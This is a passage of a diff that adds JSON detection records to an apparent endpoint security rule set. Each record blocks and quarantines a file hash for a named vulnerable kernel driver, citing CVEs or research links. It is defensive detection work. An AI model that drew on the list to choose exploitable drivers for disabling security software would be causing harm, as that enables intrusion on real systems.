+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.818421Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b12d0368991e9d93d9fa131dab8d535a0b15f260df062f548f859306a94e932c",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "65e6f463-2105-5194-9deb-f8b7c40ea215",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.984656Z",
+ "creation_date": "2026-03-23T11:45:29.984658Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.984664Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "21af8e034ca42ab24a5d1623f70de9c66eeea63d72aeb0f1846b1e04dbdf4f51",
+ "comment": "Vulnerable Kernel Driver (aka BS_I2cIo.sys) [https://www.loldrivers.io/drivers/66be9e0a-9246-4404-b5b5-7fbde351668f/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "65ec4d6f-b709-51e3-99d1-74e962ea50fd",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.980168Z",
+ "creation_date": "2026-03-23T11:45:29.980170Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.980175Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ad8fd8300ed375e22463cea8767f68857d9a3b0ff8585fbeb60acef89bf4a7d7",
+ "comment": "Vulnerable Kernel Driver (aka rzpnk.sys) [https://www.loldrivers.io/drivers/1c6e1d3b-f825-4065-9e0c-83386883e40f/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "65f06645-229d-5bf7-9270-098096e331fa",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.969506Z",
+ "creation_date": "2026-03-23T11:45:29.969508Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.969513Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4e89a5a25969953961db2a2a1a5c73c8af48f7af169ac3fd098171556bf0854d",
+ "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "65f1ef83-2340-5b41-b65d-2a3120591628",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.816654Z",
+ "creation_date": "2026-03-23T11:45:30.816656Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.816662Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7220924a787b57f757dd84b30bcd53eb11647eb65a94bfb6ffc6773aa6e6f1bf",
+ "comment": "Vulnerable Kernel Driver (aka avalueio.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "660b63f3-d25c-59cb-9b38-662236b5d029",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.832799Z",
+ "creation_date": "2026-03-23T11:45:30.832801Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.832806Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1fcba19e4897ac0b03116ae3e533a361cfcb7bddba880edbf6bc89b9df056671",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "661269d3-3578-5f07-9b4f-e2b4b589e70b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.984191Z",
+ "creation_date": "2026-03-23T11:45:29.984193Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.984199Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6f3937451f0170a0aec3033cadceeb86ab30ee3c67add3926e116ccc20c0d9a7",
+ "comment": "Vulnerable Kernel Driver (aka OpenLibSys.sys) [https://www.loldrivers.io/drivers/2e4fedb0-30ed-400d-b4e1-b2b2004c1607/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6612fecd-6b53-5cf7-8472-498bad7e0729",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.818626Z",
+ "creation_date": "2026-03-23T11:45:31.818629Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.818637Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f5a1fa889a6ce70d3ffee1cf2da3ee2b3c0c12a60226fc91fd9df1dae87e56cf",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "661cff52-c50c-59e2-a650-8bee7d2fc257",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.615065Z",
+ "creation_date": "2026-03-23T11:45:29.615067Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.615072Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "952199c28332bc90cfd74530a77ee237967ed32b3c71322559c59f7a42187dc4",
+ "comment": "MICRO-STAR vulnerable drivers (aka NBIOLib_X64.sys, NTIOLib_X64.sys, NTIOLib.sys and NBIOLib.sys) [CVE-2021-44899] [http://blog.rewolf.pl/blog/?p=1630] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6625ded1-3b30-51a2-852c-4ce8f68a7f8a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.974178Z",
+ "creation_date": "2026-03-23T11:45:29.974180Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.974185Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2175f4289f3bae19b058e5a4f590c200bede255cd2716dfb054d5e0840f70359",
+ "comment": "Trend Micro Anti-Rootkit Common Module vulnerable driver (aka TmComm.sys) [CVE-2007-0856] [https://www.loldrivers.io/drivers/22aa985b-5fdb-4e38-9382-a496220c27ec/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "662c4686-eb7d-556b-af91-0c2f5709d7ee",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.473213Z",
+ "creation_date": "2026-03-23T11:45:30.473216Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.473225Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a3975db1127c331ba541fffff0c607a15c45b47aa078e756b402422ef7e81c2c",
+ "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "66312cbe-6971-5bfe-8601-de8e1c73cb6c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.151442Z",
+ "creation_date": "2026-03-23T11:45:31.151445Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.151454Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "423ab4aecd6f5241eb64922e891f09d8e90ee37a92ced8f750be152bf990bdc2",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "66345812-b972-50c0-a749-7dd872013dd5",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.488691Z",
+ "creation_date": "2026-03-23T11:45:31.488692Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.488698Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "301a1c82ed1a6d543be168e5d20a78b108829a0ec790a1bfc3628b80c56664ec",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6634ff5f-e7cb-5723-8b93-8bd8fea5ff9a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.478571Z",
+ "creation_date": "2026-03-23T11:45:30.478574Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.478583Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8561c82c5ae1ab2a5d9214adc620875d83ed7cb9a01253988f5e5aceffe7a901",
+ "comment": "Vulnerable Kernel Driver (aka vboxdrv.sys) [https://www.loldrivers.io/drivers/2da3a276-9e38-4ee6-903d-d15f7c355e7c/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "663ea6df-11af-5773-a442-b4c7eecf50b9",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.607834Z",
+ "creation_date": "2026-03-23T11:45:29.607836Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.607842Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d7ddf874304556f8a10942a29b3d387cb5155a7419f87813557fe728cb14806d",
+ "comment": "Micro-Star MSI Afterburner vulnerable driver (aka RTCore32.sys and RTCore64.sys) [CVE-2019-16098] [https://www.loldrivers.io/drivers/275c80c5-a67c-4536-b29e-4e481242cb01/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "66470292-2004-5352-9acd-6f35b66dfd00",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.819260Z",
+ "creation_date": "2026-03-23T11:45:30.819262Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.819268Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2f8b68de1e541093f2d4525a0d02f36d361cd69ee8b1db18e6dd064af3856f4f",
+ "comment": "Vulnerable Kernel Driver (aka hwdetectng.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "664ab1e1-4b9f-59ac-b95d-89e227568ff0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.821329Z",
+ "creation_date": "2026-03-23T11:45:30.821332Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.821340Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c6a5663f20e5cee2c92dee43a0f2868fb0af299f842410f4473dcde7abcb6413",
+ "comment": "Vulnerable Kernel Driver (aka ComputerZ.Sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "66516eff-f81b-5268-a694-f0a5b681a03a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.825136Z",
+ "creation_date": "2026-03-23T11:45:31.825140Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.825148Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f736f6440a3c64238229f013e09bb45973e184a81947b6b9d5d851b7209f653c",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6652387b-3163-5cde-95ac-d8c503bf397d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.491419Z",
+ "creation_date": "2026-03-23T11:45:31.491422Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.491430Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f2edfc4d4a23b28f3157025d4a7235bebd649524fa3844805ddf05fbbc8ae6b0",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6664b715-325d-5ada-8f9e-fd7c099ec8ac",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.972526Z",
+ "creation_date": "2026-03-23T11:45:29.972528Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.972533Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "263e8f1e20612849aea95272da85773f577fd962a7a6d525b53f43407aa7ad24",
+ "comment": "TG Soft vulnerable driver (aka viragt.sys and viragt64.sys) [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "66786378-97dc-56ef-a4bc-c82cb4b4ddf5",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.142434Z",
+ "creation_date": "2026-03-23T11:45:31.142436Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.142442Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c22f7f12154a4d834f76210372bf9ae79cf9e5bdaa5a9a319274c2d4da73eb12",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "66835805-bb8f-5449-b98a-a821491be3b3",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.154093Z",
+ "creation_date": "2026-03-23T11:45:31.154096Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.154101Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c498def339dbf7392a6290a34250a44928ef97cac638651709a2ccf7b7cf9176",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6684899d-c8f7-534e-b7be-4b80a4914527",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.832151Z",
+ "creation_date": "2026-03-23T11:45:30.832153Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.832159Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c0a07bf1777e2b8c94226af8b9acdfff7f8719c59262c9fc1bd4805ee40c2b1b",
